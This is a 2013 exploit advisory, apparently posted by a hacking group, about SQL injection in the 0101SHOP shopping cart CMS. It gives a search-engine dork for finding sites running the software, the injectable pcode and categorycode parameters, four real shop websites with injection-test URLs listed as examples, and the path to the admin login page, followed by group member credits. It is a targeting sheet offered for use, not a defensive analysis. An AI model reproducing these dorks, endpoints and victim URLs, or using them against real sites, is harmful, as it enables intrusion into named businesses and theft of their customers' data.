.:: In The Name Of God ::.
####################################################
# 0101SHOP CMS SQL Injection Vulnerability #
# Security Risk : High #
# Discovered By IRaNHaCK Security Team (MR.XpR #
# Our WebSite : IRaNHaCK.ORG #
# Tested On : XP , 7 , BackTrack #
# Date : 2013-02-16 #
# Version : All #
# Category : WebApp #
####################################################
================================================================
1- Dork : intext:"Powered by 0101HOST - Shopping Cart System." =
=
2- Vulnerability(s) : =
=
Target.Com/productdetails.asp?pcode=[SQL] =
Target.Com/listproduct.asp?categorycode=[SQL] =
=
3- Example : =
http://llsclifestyle.com/listproduct.asp?categorycode=101%27 =
http://shop.pmcguild.hk/productdetails.asp?pcode=31043-150%27 =
http://shop.honghaico.hk/listproduct.asp?categorycode=1%27 =
http://shop.hkdongjian.com/listproduct.asp?categorycode=102%27 =
=
4- Admin Page : =
Target.Com/adminlogin.asp =
================================================================
**********************************************************************************************
We Are : Mr.XpR - UnknowN - FarbodEzRaeL - Bl4ck.Viper - Siamak.Black - MojiRider - V30Sharp *
Mr.FixXxer - mr.remot3rs - nazila - HACKER OF FLOOD & All Members Of IRaNHaCK.ORG *
**********************************************************************************************
./By MojiRider
./Persian Gulf For Ever